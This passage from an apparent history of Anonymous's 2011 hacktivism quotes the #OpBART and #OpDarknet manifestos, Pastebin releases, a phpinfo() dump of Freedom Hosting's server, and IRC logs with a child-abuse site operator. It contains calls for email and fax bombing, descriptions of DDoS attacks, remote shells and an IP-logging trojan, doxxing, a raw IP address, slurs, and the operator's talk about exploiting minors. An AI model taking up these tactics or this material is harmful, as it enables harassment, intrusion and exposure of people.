shoots him in the back. Mehserle was convicted of involuntary manslaughter and released after 11
months.
(https://www.youtube.com/watch?v=nXWSgG-KNng)

On August 11, 2011, anti-BART activists were planning a rally at San

Francisco’s Civic Center transit stop to protest the July 3 shooting of a
homeless man named Charles Hill. A local transit police shooting wasn’t a
likely event to ever draw in Anonymous, but the response from BART to the
planned protest sparked Anons into action.
To thwart protesters from coordinating via mobile devices, BART cut cell
service to its downtown stations. When news got out, Anonymous turned on
BART with a vengeance. Announcements of action on behalf of the anti-
BART protestors began pouring onto YouTube; Anti-BART anon accounts
opened on Twitter; #OpBart formed on IRC.
This is a message from Anonymous to the Bay Area Rapid Transit
System (BART)
TO THE PEOPLE OF THE USA:
The past year has brought about some substantial awareness
through some unfortunate events that have occurred throughout our
world. From internet censorship to the unnecessary violence inflicted
upon unarmed civilans, we’ve all seen what can happen once a
portion of us are gagged.
In Egypt and Tunisia, we saw people struggling to make their voices
heard. We have seen companies such as Telecomix delve into the
nastiness of political corruption in an attempt to free those censored
individuals from their prisons of silence. We seen social media such
as FaceBook and twitter explode with users from around the world
speaking out against censorship.
Today, we’ve seen America come alive. In the Bay Area, we’ve seen
people gagged, and once more, Anonymous will attempt to show
those engaging in the censorship what it feels like to be silenced.
#OpBART is an operation geared toward balance – toward learning.
You do not censor people because they wish to speak out against the
wrongs the wrongful things occurring around them. The Bay Area
Rapid Transit has made the conscious decision of ordering various
cell phone companies to terminate services for the downtown area
inhibiting those in the area from using cell phones – even in the case
of an emergency.

To BART:
We will not tolerate censorship.
We will do everything in our power (we are legion) to parallel the
actions of censorship that you have chosen to engage in.
We will be free to speak out against you when you try to cover up
crimes, namely on behalf of those who have engaged in violence
against a mostly unarmed public.
We will set those who have been censored free from their silence.
That’s a promise.
Anonymous demands that this activity revolving around censorship
cease and desist and we know you are already planning to do this
again.
We will not issue any more warnings.
TO THE PEOPLE OF SAN FRANCISCO:
People of San Francisco, join us Monday, August 15th at 5pm for a
peaceful protest at Civic Center station to illustrate the solidarity
with people we once knew and to stand up for your rights and those
of your fellow citizens.
We will be wearing “blood” stained shirts for remembrance to the
blood that is on the hands of the BART police.
For the people outside of San Francisco, show solidarity by using
black fax, email bombs, and phone calls to the BART Board of
Directors. BART decided to cut off your communications and now we
will flood theirs.
We request that you bring cameras to record further abuses of power
by the police and to legitimize the protest. The media will certainly
spin this in an attempt to make our actions appear to be violent or
somehow harmful to the citizenry at large. Remember, this is a
peaceful protest. Any actions trying to incite violence in our protest
are not of our people, and they ought to be discouraged.
We are Anonymous,
We are legion,
We never forgive,
 We never forget,
Expect us.
BART contact info:
Phone:
510 465-2278, 415 989-2278, 650 992-2278, 925 676-2278, 510
441-2278, 510 236-2278, and 510 465-2278
Fax: (510) 464-6011
Email: [email protected]
Fliers / Back Fax images
Blacked out: http://a.yfrog.com/img616/5783/2j1oi.jpg
“Bart”: http://www.artificialeyes.tv/files/opBART_exiledsurfer.jpg
Back Fax tools
http://youranonnews.tumblr.com/post/8832483770/email-and-fax-
bomb-info-for-opbart”
Over the next month, Anon hackers attacked the ill-defended BART and
MyBART websites and released customer and police data, and demanded
BART spokesman Linton Johnson into resigning after finding and
threatening to post explicit pictures of him, which they eventually did.
A database belonging to the BART Police Officers Association was hacked by Anonymous and the
names, postal and email addresses of 102 police officers posted online

Representatives of all levels of media showed up at several Monday protests,

helicopters circling overhead, and police riot lines greeted them. A couple of
times, media and police found they far outnumbered the protestors. The
BART police closed stations and the San Francisco police department
arrested activists outside the stations. A few Anons showed up in masks at
the protests and were mobbed by the press.
Anonymous amplified and encouraged voices on the ground, in particular the
longstanding group calling for the dismantling of the BART police force.
Without Anonymous involvement, the anti-BART protests would have been
nationally unremarkable. Instead, the anti-BART protests against police
violence gained nationwide coverage. And the FCC even opened an inquiry
into the potential national ramifications of a small regional police force
having power over telecom infrastructure.
No one knew it yet, but it was a dress rehearsal for what would become the
largest effort Anonymous has ever undertaken—its support for the Occupy
Wall Street movement.
Occupy Wall Street
Occupy Wall Street was not an Anonymous plan, but Anonymous came out
in support of it in late August 2011 and drew media attention to it. When
people descended on Lower Manhattan on September 17, it was the people
wearing Guy Fawkes masks that were most swamped by the press.
Anonymous was using the techniques it had learned to create media buzz to
support the Occupy Wall Street movement.

Peaceful protest in Zucotti Park. Violence caught on camera the previous weekend showed police
arresting 80 protesters and, in one notorious case, spraying mace into the faces of female protesters.
The video generated an outcry over the NYPD's “cowardly” use of force on peaceful protesters.

Occupy Wall Street was not like Tahrir Square in Egypt; Tahrir attracted the
young heroes, the educated, and cutting edge of Egypt. Occupy Wall Street
welcomed the misfits of society. Many were society’s forgotten and
disempowered, not the widely oppressed masses that had demonstrated
elsewhere. The people who found their way to the parks around America and
set up tent cities in September and through October were the rejects,
homeowners who fell victim to predatory subprime mortgages during the
2008/09 financial crisis, and students who had insufferable student loans.
They were the misfit army, unarmed but unwilling to remain silent and
invisible. In this they were a perfect fit for Anonymous. Both collectives
were bound together by being the kinds of people who never found a
comfortable place in society.
Anonymous watched the evictions, arrests, and even beatings over the weeks.
Anons started targeting law enforcement as retribution. “We thought we had
every right to gather in public parks, to speak our demands,” one person
wearing a Guy Fawkes mask said. “And they systematically targeted us for
elimination. The 18 cities who coordinated the crackdown against Operation
Wall Street a month ago was a breaking point for many. So we decided it was
time for us to coordinate a raid of our own.”
Anonymous hacked Stratfor—a private intelligence firm. “Stratfor promotes
global market stability, whereas we want financial meltdown”—a meltdown
specifically aimed at the 1 percent. “It’s about creating an egalitarian society
without bosses or masters, it’s about forcefully redistributing the wealth and
power in society.” Anonymous used the Stratfor logins to compromise many
of the top 100 U.S. government contractors—and went on to attack many of
them, releasing even more material in the weeks that followed.

Final Word
2011 has been called the “Year of the Hack.” Until then, few people had
heard of Anonymous, understood what a DDoS attack was, or even realized
that hackers were capable of bringing down entire networks. But as geek
bloggers love to point out, 2011 was the year of the hack, the year that
Anonymous became a household name and armies of its devotees took to the
streets, all wearing Guy Fawkes masks like that final, mind-blowing,
Parliament-exploding scene in V Is for Vendetta. Anonymous, of course, has
been around for a while but 2011 was the hacktivists’ coming of age.
Anonymous became bolder, stranger, more threatening, and especially more
comforting during the Arab Spring and Occupy Wall Street, fighting with the
unfair and unjust systems of society. Anonymous gave the underdog a little
hope—and a little hope can be a dangerous thing.
It turns out Anonymous would even do more to take down illicit sites on the
Dark Web than the FBI and all other law enforcement agencies in the world
combined. Anonymous could do this because of a willingness to act outside
the confines of normal society.
 3
ANONYMOUS: OPERATION DARKNET
Anonymous spent much of 2011 attacked government and corporate
websites. However, Anons also shut down over 40 child porn sites on the
Dark Web in October 2011 in “Operation Darknet” (also known as “To Catch
A Predator”). This would prove to be only the start of a series of ops to take
down thousands of child porn sites on the Dark Web. Anonymous launched
“Operation Darknet” when it discovered a network of child pornography
websites on the Hidden Wiki, a starting page and directory of website on the
Dark Web. The site contained links to over 40 child pornography websites.
Anonymous decided to use their hacking abilities against these websites to
take them down.

https://www.youtube.com/watch?v=aFuJp_zPIlU

Dear citizens of the internet.

Over the past decade the Internet has become an increasingly
integral part of our daily lives. It has evolved into the catalyst behind
free media, free speech, and global communication. Since its
inception the worldwide web has become a prominent medium for
individuals such as journalists and activists alike.
However, the great injustice lurks beneath the surface of an
infestation of abhorrent animals have been growing parasitically,
spreading like cancer. Unknown to the world it is concealed and
victimized innocent children, as well as adults. The growing trade of
child pornography has become a major problem. While government
organizations have put much effort into the dismantling of
individuals and websites dedicated to this repulsive trade, the
providers of this content have grown frustrated and moved their
trades into a much seedier place known as the darknet, a network
dedicated only to the inequities that are outcasted by the society we
strive in.
Unfortunately a potentially benevolent resource has been corrupted
by these sick and sadistic abominations of the world. We,
Anonymous, have an eternal duty to fight against the social injustices
of this world. When we came into this virtual realm we were
disgusted with the content that was provisioned and readily available
for the perverted masses. Many of us hve lingering traumatic images
of the material that these pedophiles were hiding on the darknet.
Anonymous took a pledge to defend the defenseless and fight for the
fallen. We rallied an army called the Legion and armed ourselves
with our Chris Hansen cannons. We set up for the great hunt which
is become "Operation Darknet" also known as "To Catch a
Predator."
We found that a majority of the dog at pedophiles were using a site
called Lolita City. We demanded that the major provider of the host
known as Freedom Hosting stop hosting their servers of such
reprehensible materials.
Unfortunately, to our horror, the owner of Freedom Hosting was the
perpetrator for most of the pedophilia content. We are now aware
that
this provider has over 100 gigabytes of content depicting children
being sexually exploited for money that only the underlining insects
of this world could take pleasure in. While successful in our
 onslaught to identify users and take down the hosting provider of this
unacceptable content, the target is a vast sea of many providers.
However, we fully intend to make it uninhabitable for these
disgusting degenerates to exist without the fear of prosecution or
death.
This is our message, our manifesto. You may hold us to every last
word, for we will never turn a deaf ear on the screams of innocent
children.
You know who you are and so do we.
We are Anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us.
The media was baffled: “This isn’t the Anonymous we all know, Anonymous
was known for taking down government and business websites in an attempt
to get publicity. Now, the group is hacking for good things, this is the type of
hacking we like. What are your thoughts on this? Do you think Anonymous
has decided to change their ways and do good?”
The major events of the Operation took place on October 14 and 15, as
archived in a Pastebin document. On October 14, Anonymous hackers began
their mission by removing links to underage pornographic images and videos
on the Hidden Wiki. Shortly after the links returned online, the site became
inaccessible in its entirety as a result of DDoS attack initiated by the group.
Following the initial attack on the Hidden Wiki, Anonymous noticed that “95
percent of the child pornography listed on the Hidden Wiki shared a digital
fingerprint with the shared hosting server at Freedom Hosting,” and thus
warned Freedom Hosting to remove the content from its server at 9 p.m.
(CST) on October 14. Freedom Hosting refused to comply and two and a half
hours later, Anonymous completely shut down Freedom's services with
DDoS attacks that created a 1GB SQL and 100,000 ASCII files of Guy
Fawkes masks every five minutes.
Anonymous said: “By taking down Freedom Hosting, we are eliminating 40+
child pornography websites, among these is Lolita City, one of the largest
child pornography websites to date containing more than 100 GB of child
pornography. We will continue to not only crash Freedom Hosting’s server,
but any other server we find to contain, promote, or support child
pornography.” It was estimated that Lolita City contained 1.4 million pictures
and videos of child pornographic content.
Lolita City homepage. Account details of 1,589 members of Lolita City were posted as part of
Anonymous’ Operation Darknet, a wider effort aimed against abuse of the Tor network by pedophiles.
Lolita City alone housed more than 100GB of child pornography, according to a statement by
Anonymous.

Around 5 p.m. (CST) the next day, Freedom Hosting was able to restore
service completely via backup servers. Anonymous issued several additional
warnings, giving them 3 hours before taking down the server again, this time
using an attack codenamed "Chris Hanson," which uploaded episodes of "To
Catch a Predator" labeled as "CP" on to the site.
On October 18, Anonymous released the names of the 1589 Lolita City users,
including username, volume of images uploaded, and age of the account.
They invited the FBI and Interpol to investigate the data further.
The last official Pastebin communique from #OpDarknet was uploaded on
November 2nd, 2011. They stated that the whole plan behind the operation
was not to take down Tor or the darknet in general, but specifically to attack
the CP sharing occurring on these sites. It revealed "The Honey Pawt," a
modified TorButton for Firefox, which, when used, would log users
information if they tried to access the Hard Candy wiki or Lolita City.
On October 27, Operation Paw Printing went into effect for 24 hours,
marking the end of the DDoS attacks on The Hidden Wiki and
implementation of the modified TorButton, which was only available on the
“Hard Candy” page. When a user of Hard Candy updated the button, their IP
information was logged. Over the course of the day, 190 unique users and IP
addresses were logged, mapped out below.

Hacktivist group Anonymous released 190 alleged pedophiles by revealing their IP addresses—a
unique internet address which can be used to trace their physical address. The information was
harvested in 24 hours from a darknet, by tricking posters into downloading tracker software.
Anonymous published details of how it harvested details from the supposedly
“protected” sites, using a trick to persuade posters to download software that
tracked their web use. Anonymous published the files on Pastebin, along with
a description of the complex process used to snare the users. Anonymous
described their data as “forensics.”
Via a posting, the hacker collective said, “In the last three weeks of Operation
Darknet we gained much support from the world.”
There also was a large amount of resistance from the pedophile community
claiming that Tor was their safe haven with messages such as: "We are here
to stay. It is our god given right that we can choose to have our sexual
preferences for youth.”
The next several pages contain the releases by Anonymous on Pastebin.

https://pastebin.com/u/opdarknet
#OpDarknet—To Catch A Predator
In our quest rid the darknet of trash such as destroying the major source of
child pornography, we encounter much resistance. After our last battle, we
were successful in taking out a majority of Freedom Hosting 40+ CP sites for
over 24 hours.
Yet our worst fear came back to life. The server administrator of Lolita City
came onto #anonops Satuday, the 15th of October 2011 seeking retribution
for the Anonymous members involved with #opdarknet. Here is an excerpt of
the individual's chat:
pedolover: what are the cunts that brought down Lolita City?
pedolover: am setting my website down
pedolover: for it not to be up?
pedolover: i make 600 GBP a day
pedolover: there some fuckers by the name of ****** [redacted]
pedolover: that said they were hunting us
pedolover: i'm going fuck you up who ever you are
pedolover: i have connections to the FSB and the my site is bankrolled by the
Russian mob
Two hours later Freedom Hosting was up and running with the official
message from the server administrator:
15th October 2011 Denial of Service Attacks.
Today and several times this week FH was the victim of DoS attacks
which resulted in unavailability of php or mysql on hosted sites.
A user registered an account and used it to run extremely slow mysql
queries among other things to purposely harm the server.
For this reason creating new accounts will be disabled until further
notice.
I would also like to announce that the snapshot based backup system is
up and running, backups are made daily and kept for up to 1 month, this will
protect against any future data loss due to accounts being hacked.
We quickly scrambled to running "The Legion" against Freedom Hosting (a
script that we uploaded which creates a 1 GB SQL and 100,000 ascii files
with of Guy Fawkes mask every 5 minutes). To our dismay our six accounts
we had remote shells were deleted, of those two were CP sites that had
remote inclusion errors that we used to hack. One of the sites, Lolita City
had a remote shell but it was deleted from the site.
It came to a clear indication that either Lolita City's owner aka "pedolover"
was the server administrator of Freedom Hosting or they were collaborating
with Freedom Hosting to provide their services. This is due to the fact that of
six out of seven Freedom Hosting accounts we use were deleted. Lolita
City's compromised account was the only one not deleted.
Also the administrator of Freedom Hosting disabled new user registration.
As a result we could no longer use "The Legion" to cause havoc to the 40+
child pornography sites. In addition we realized that there were now 1626
total users on Lolita City db versus the 1589 total users in our dump of the
user database on Tuesday.
We loaded up LOIC and perform Denial of Service attacks against Freedom
Hosting / Lolita City. It was a total failure as the server administer
significantly locked down their server against LOIC. With limited options
left in our arsenal, we launched our last ditch effort. We released ********
aka 'Chris Hanson', a muti-function DDoS and AI into the wild.
While Chris Hanson may not be effective against the new security systems
that Freedom Hosting has, it has one thing which 'The Legion' and LOIC
does not have. It is a multipurpose crawler with the ability to upload files.
We then found out that our geographic node formerly used by The Kraken
was now used as a CDN for one of the world's largest media companies.
We then started to put together a sting operation. After analyzing the list of
Lolita City users, we were able to identify 13 of them. Also we set off 'Chris
Hanson' to start uploading episodes of To Catch a Predator onto Lolita City
disguised as "CP" or "Catch Pedophiles".
So Lolita City users, when you start looking at anything labeled as "CP" don't
be surprised that your watching Chris Hanson episodes of "To Catch A
Predator" okay? Your no different than those idiots.
So farewells. Pedos be very afraid. 'Chris Hanson' and Anonymous are after
you.
#occupywallstreet, #freeanons, #freetopiary, #antisec
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
#OpDarknet Major Release & Timeline
#OpDarknet Press Release - 10/15/2011
------------------------
Timeline of Events
------------------------
At apprx 8:30 CST while browsing the Hidden Wiki we noticed a section
called Hard Candy which was dedicated to links to child pornography. We
then removed all links on the website, within 5 minutes the links were edited
back in by an admin. For this reason, we will continue to make the Hidden
Wiki unavailable.
At apprx 8:45 CST we noticed 95% of the child pornography listed on the
Hidden Wiki shared a digital fingerprint with the shared hosting server at
Freedom Hosting.
--
At apprx 9:00pm CST on October 14, 2011 We identified Freedom Hosting
as the host of the largest collection of child pornography on the internet. We
then issued a warning to remove the illegal content from their server, which
they refused to do.
--
At apprx 11:30pm CST on October 14, 2011 We infiltrated the shared
hosting server of Freedom Hosting and shutdown services to all clients due to
their lack of action to remove child pornography from their server.
--
At apprx 5:00pm CST on October 15, 2011 Freedom Hosting installed their
backups and restored services to their child pornography clients. We then
issued multiple warnings to remove all child pornography from their servers,
which Freedom Hosting refused to do.
--
At apprx 8:00pm CST on October 15, 2011 despite new security features, we
once again infiltrated the shared hosting server at Freedom Hosting and
stopped service to all clients.
------------------------
Our Statement
------------------------
The owners and operators at Freedom Hosting are openly supporting child
pornography and enabling pedophiles to view innocent children, fueling their
issues and putting children at risk of abduction, molestation, rape, and death.
For this, Freedom Hosting has been declared #OpDarknet Enemy Number
One.
By taking down Freedom Hosting, we are eliminating 40+ child pornography
websites, among these is Lolita City, one of the largest child pornography
websites to date containing more than 100GB of child pornography.
We will continue to not only crash Freedom Hosting's server, but any other
server we find to contain, promote, or support child pornography.
------------------------
Our Demands
------------------------
Our demands are simple. Remove all child pornography content from your
servers. Refuse to provide hosting services to any website dealing with child
pornography. This statement is not just aimed at Freedom Hosting, but
everyone on the internet. It does not matter who you are, if we find you to be
hosting, promoting, or supporting child pornography, you will become a
target.
------------------------
Images & Misc
------------------------
Dead Server Screenshot: http://i55.tinypic.com/vy9w7k.jpg
--
Freedom Host PR Screenshot: http://i53.tinypic.com/o5qlip.jpg
--
Our Manifesto:
http://www.youtube.com/watch?v=aFuJp_zPIlU
--
#Antisec | #Anonymous | #FreeTopiary | #AnonOps | #FreeAnons |
#OccupyWallSteet | #OWS
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
------------------------
 Server Information
------------------------
phpinfo() of FreedomHosting:
System FreeBSD server 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0:
Tue Sep 27 18:45:57 UTC 2011 root@amd64-
builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64
Build Date Aug 26 2011 03:00:30
Configure Command './configure' '--with-layout=GNU' '--
localstatedir=/var' '--with-config-file-scan-dir=/usr/local/etc/php' '--disable-
all' '--enable-libxml' '--with-libxml-dir=/usr/local' '--with-pcre-
regex=/usr/local' '--with-zlib-dir=/usr' '--program-prefix=' '--disable-cgi' '--
with-apxs2=/usr/local/sbin/apxs' '--with-regex=php' '--with-zend-vm=CALL'
'--disable-ipv6' '--prefix=/usr/local' '--mandir=/usr/local/man' '--
infodir=/usr/local/info/' '--build=amd64-portbld-freebsd8.2'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /usr/local/etc
Loaded Configuration File /usr/local/etc/php.ini
Scan this dir for additional .ini files /usr/local/etc/php
Additional .ini files parsed /usr/local/etc/php/extensions.ini
PHP API 20090626
PHP Extension 20090626
Zend Extension 220090626
Zend Extension Build API220090626,NTS
PHP Extension Build API20090626,NTS
Debug Build no
Thread Safety disabled
Zend Memory Manager enabled
Zend Multibyte Support disabled
IPv6 Support disabled
Registered PHP Streams php, file, glob, data, http, ftp, zip, compress.zlib
Registered Stream Socket Transports tcp, udp, unix, udg
Registered Stream Filters convert.iconv.*, string.rot13, string.toupper,
string.tolower, string.strip_tags, convert.*, consumed, dechunk, zlib.*
Configuration
apache2handler
Apache Version Apache
Apache API Version 20051115
Server Administrator [email protected]
Hostname:Port xqz3u5drneuzhaeo.onion:0
User/Group www(80)/80
Max Requests Per Child: 10000 - Keep Alive: off - Max Per Connection:
100
Timeouts Connection: 900 - Keep-Alive: 60
Virtual Server Yes
Server Root /usr/local
Loaded Modules core prefork http_core mod_so mod_authz_host
mod_file_cache mod_cache mod_disk_cache mod_filter mod_deflate
mod_env mod_expires mod_headers mod_setenvif mod_mime mod_status
mod_autoindex mod_dir mod_alias mod_rewrite mod_bw mod_php5
mod_alias_basedir mod_vhost_alias_frdmhst
Apache Environment
Variable Value
HTTP_HOST xqz3u5drneuzhaeo.onion
HTTP_CONNECTION close
HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; rv:5.0)
HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
HTTP_ACCEPT_CHARSET ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_DNT 1
HTTP_COOKIE visitz=0; sort=0a
PATH /bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/local/bin
SERVER_SIGNATURE no value
SERVER_SOFTWARE Apache
SERVER_NAME xqz3u5drneuzhaeo.onion
SERVER_ADDR 10.0.1.2
SERVER_PORT 80
REMOTE_ADDR 10.0.1.2
DOCUMENT_ROOT /home/fh/www
SERVER_ADMIN [email protected]
SCRIPT_FILENAME /home/fh/users/l/i/lolitacity/www/index.php
REMOTE_PORT 56818
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING no value
REQUEST_URI /users/lolitacity/index.php
SCRIPT_NAME /users/lolitacity/index.php

#OpDarknet | Full Chat Logs w/ Owner of LC and FH

#OpDarknet Official Release 10/25/2011
--
In our lultz of hunting pedo bear, we received several surprise visits in our
IRC channel from the King of the Pedophiles, and also the sickest bastard on
the planet. The logs from out conversations are posted below.
Our names have been removed for anonymity. This chat is between
"lolita_fucker" aka "pedolover" and Anons.
We Are Anonymous.
We Are Legion.
We Do Not Forgive.
We Do Not Forget.
Expect Us.
Chat logs dated October 15, 2011:
<pedolover> what are the cunts that brought down Lolita City?
<pedolover> am setting my website down
<pedolover> for it not to be up?
<pedolover> i make 600 GBP a day
<pedolover> there some fuckers by the name of ****** [redacted]
<pedolover> that said they were hunting us
<pedolover> i'm going fuck you up who ever you are
<pedolover> i have connections to the FSB and the my site is bankrolled by
the Russian mob
-----------------------------------------------------------------
Chat logs dated October 17, 2011:
* lolita_fucker ([email protected]) has joined #opdarknet
<lolita_fucker> hello fags
<*****> hey whatsup dude
<*****> i just started running it
<*****> youre here fast
<*****> we were expecting you
<lolita_fucker> are you responsible for fucking up my server?
<*****> yes
<lolita_fucker> you better watch out
<*****> I'm literally smiling right now.
<*****> you didnt like it?
<lolita_fucker> i hired some thugs to cause some trouble for some of your
little occupy events tommorow
<lolita_fucker> your going to get more of your fellow people in more trouble
<*****> 'little' occupy events ?
<lolita_fucker> also when we find you
<*****> lol
<lolita_fucker> we will plant some gifts on your computer
<*****> oh pls no
<*****> Egg what have you to say about that
<*****> ,insult lolita_fucker
<Egg> lolita_fucker: You are nothing but a gorbellied coagulation of porous
buzzard. (Bot)
<*****> Oh
<lolita_fucker> some of the users of Lolita city are high level politicians,
cardinals, and business men
<*****> we already know who they are
<*****> dont worry
<lolita_fucker> we'll make sure your lives are ruined for messing with us
<lolita_fucker> the people you found were idiots for using the same info
<*****> Well, get back to your server
<*****> it wont be up long anymore
<*****> you have work to do
<*****> and what makes you think youll find us
<*****> just curious
<lolita_fucker> heh
<*****> i can tell you that not even a nasa supercomp
<*****> would be able to do that
<lolita_fucker> yes i own freedom hosting
<*****> ;o
<lolita_fucker> but i don't run it
<*****> freedomhost is not a prob anymore
<*****> even with disabled user accs
<lolita_fucker> you won't be able to fuck around with people like me
<*****> well we already showed
<lolita_fucker> i drive a Mercedes G550
<*****> that we are able to
<*****> Nice car. You're still going down.
<*****> i drive enough to fuck up your servers
<*****> people like you? perverted freaks?
<lolita_fucker> i own two of the hottest night clubs in Paris and London
<lolita_fucker> I am one of the most important business men in Dubai
<*****> Well
<lolita_fucker> you never will be able to touch people like me
<*****> Well you're certainly not one of the smartest.
<*****> what happens to pedos in UAE?
<vicious> looks like we already touched your tralala
<lolita_fucker> heh
<lolita_fucker> tell your little occupy wall street fags the NYPD will be
beating their ass tommorow
<*****> Nah
<*****> busy looking at you trying to keep your server up
<lolita_fucker> heh
<lolita_fucker> we will show you that we are not your average people
<lolita_fucker> i have connections to the top of governments
<*****> you already showed the opposite
<*****> you're far far lower than your average person
<lolita_fucker> and CEO's of the world's largest companies
<*****> who is lolita_fucker?
<*****> pedo server owner.
<*****> hes mad
<*****> lolita_fucker, umad?
<lolita_fucker> yes i am mad
<*****> should just ban him?
<lolita_fucker> i have users TorChatting me
<*****> not yet
<lolita_fucker> to fix this issue
<lolita_fucker> i am a busy man
<*****> i have to tell you
<*****> thats not possible
<*****> !kb lolita_fucker
* Egg sets ban on *!*@AN-nrb.e52.94qra2.IP
* Egg has kicked lolita_fucker from #opdarknet (Requested (*****))
-----------------------------------------------------------------
Additional chat dated October 19th, 2011:
* lolita_fucker ([email protected]) has joined #opdarknet
<lolita_fucker> hello you little fuckers
<lolita_fucker> why is my website and hosting company all over the German
news?
<lolita_fucker> you have been causing my Indian tech support headaches all
fucking week with your little "hacking" attempts
<lolita_fucker> there is this fag called "anonymousArson"
<lolita_fucker> is he this fucker VisionZ that has been causing all the fucking
trouble? I just met up with one the users of Lolita City
<lolita_fucker> he's a fucking Bishop
<lolita_fucker> and is now scared because of the media
<*******> hey
<*******> oh yea?
<*******> he's a bishop
<*******> ?
<*******> lol
<*******> Yea fucking right.
<*******> This isn't a ches game.
<lolita_fucker> also one of the big investment bankers for Goldman Sachs is
going to have to fucking bank roll more thugs to fuck around your little
Occupy Wall Street movement
* ******* has quit (Connection closed)
<*******> We know we know where u live.
<*******> Lolita_fucker
<*******> we have ur ip
<*******> Right now i can ddos u
<*******> If i wanted to
<*******> You are an idiot, you came here with no protection.
<lolita_fucker> your little protesters are nothing compared to the people that
use Freedom Hosting and sites like Lolita City
* ******* smells a troll.
<*******> oh yea?
<*******> Then how was it so easy to take down the sites
<lolita_fucker> what fucking IP do you have?
<lolita_fucker> your fucking up the ass?
<lolita_fucker> haha
<lolita_fucker> little cunts
<*******> yours
<*******> Your an indian
<*******> you're an indian.
<lolita_fucker> i told you
<lolita_fucker> that was my fucking IT tech support
<*******> we have ur address
<lolita_fucker> you fuckers have been causing a lot of headaches for our
users
<*******> we're going to report you to your isp
<*******> we've also got dox.
<lolita_fucker> with your "Chris Hansen" who the fuck he is
<*******> That proves he's indina.
<*******> You better leave
<*******> now, or you're computer will be rooted.
<lolita_fucker> if you want my home ip connection here is my fucking ip:
85.24.189.121
<*******> will do
<*******> thats not his
<*******> we already have his
<*******> p0ke gave it to us
<*******> lol
<lolita_fucker> if you don't think i am fucking around
<lolita_fucker> here you go
<*******> Dude we know you live in india
<*******> we already got your ip address
<lolita_fucker> heh
<*******> and we have access to your vuln computer.
<*******> Who the fuck is he.
<*******> Learn english you stupid fuck.
<*******> Christ, troll harder.
<*******> back in my day....
<lolita_fucker> here is my fucking whois: realname : :: AnonOps Web IRC
:: lolita_fucker is connecting from [email protected]
85.24.189.121
<lolita_fucker> lolita_fucker is using modes +iwx, is using a secure
connection
<*******> it's your IP address.
<lolita_fucker> i am a fucking business man
<*******> Why should we give a fuck.
<*******> Shut the fuck up and jog on.
<lolita_fucker> you CANNOT touch me
<*******> that profits on small children's sexual pictures?
<*******> Oh christ, you sound like one of the Ayn Rand brigade.
<*******> take the pictures down. take the videos down.
<*******> Oh the joys of laissez faire capitalism, rofl.
<*******> Brings you such pleasures as PAEDOPHILIA.
<lolita_fucker> as i said i am one of owner of the two hottest night clubs in
Paris and London
<lolita_fucker> and i have a fucking million dollar import/export business in
Dubai
<*******> No you're not.
<*******> You're a filthy paedophile wasting time trolling on irc.
<*******> get a grip mate.
<*******> pedophiles cant be succesfull
<*******> And money means nothing.
<*******> they can't live a normal life
<*******> they are screw ups
<lolita_fucker> you know how much money i am i losing because of your
fucking "hacking" attempts against my side company Freedom Hosting and
Lolita City?
<*******> disturbing, disgusting
<*******> lets see, child rape, night clubs, guess that means you use drugs
on them?
<lolita_fucker> i already lost £5000
<*******> expect the price to rise.
<*******> Whats money when your self worth is so low due to being
abseloutely fucking dispised by the whole world, even a whisper about your
hobbies getting you linched in an instant and knowing that, knowing that it's
wrong yourself and having to live with that.
<lolita_fucker> once i find out this fucking "arson"
<*******> Even if you DID have that money, it probably wouldn't fill the
hole, would it.
<lolita_fucker> i'll make sure he has a good collection of gay boy porn
* ******* (*******@*******) has joined #opdarknet
<*******> Haha, o
<*******> you're a fucking filthy paedo
<*******> you're going to have 0 profit
<*******> you supposedly run paedo sites
<*******> by the end of the month
<*******> and the best you can come up with is a good collection of gay
boy porn.
<lolita_fucker> because all of you are fucking fags
<*******> Oh, arson must be quaking in his fucking boots mate.
<*******> Us? fags? you're the one posting out gay boy porn mate, sort it
out.
<*******> herp derp.
<lolita_fucker> you fucking sit on this internet chat room all day
<*******> Man, this is lulz as fuck.
<*******> can we keep him?
<lolita_fucker> when you cannot get any real fucking action in the REAL
WORLD
<lolita_fucker> trust me
<*******> ....
<lolita_fucker> when you grow up
<lolita_fucker> you will be one of my site's users
<*******> only after we beat him back to proper health with our magic heal
sticks.
<*******> you masturbate to pictures of children.
<*******> Jesus, you really don't have a leg to stand on.
<lolita_fucker> i don't need to
<lolita_fucker> i get enough fucking pussy
<*******> you support people that post sexual pictures of children.
<lolita_fucker> i have "model scouting" that i do my shit
<*******> Mate, it can't grow fucking hair.
<lolita_fucker> you have no fucking idea how many 17 and 18 lolitas want to
be models
<*******> ...
<lolita_fucker> when I pull up with my G550 benz
<lolita_fucker> they go fucking all over the shit
<*******> that you lie to and place in escourt contracts.
<*******> they are 17, 18, that's called legal you fucking retard.
<lolita_fucker> exactly
<lolita_fucker> oh
* ******* has quit (Ping timeout: 121 seconds)
<lolita_fucker> we have some 14-17 year olds right now in Paris
<*******> *******, can we keep him?
<lolita_fucker> doing this routine
<lolita_fucker> you have no fucking idea
<*******> Haha, ohshit, they are legal *changes age from 17 to 14.*
<*******> haha, really?
<*******> no, but I got an Ip.
<*******> christ.
<*******> did you just do that.
<lolita_fucker> in Sweden where I am now
<lolita_fucker> i am going to produce this awesome reality TV show
<*******> yea
<*******> ur not
<*******> dude, we know you're lying.
<lolita_fucker> you have no fucking idea how many young girls will do to be
on fucking TV
<lolita_fucker> you have no fucking idea
<*******> are you going to show it to your mother?
<*******> that lets you stay in her house still.
<*******> because you're just THAT fucking special.
<lolita_fucker> you have no fucking idea
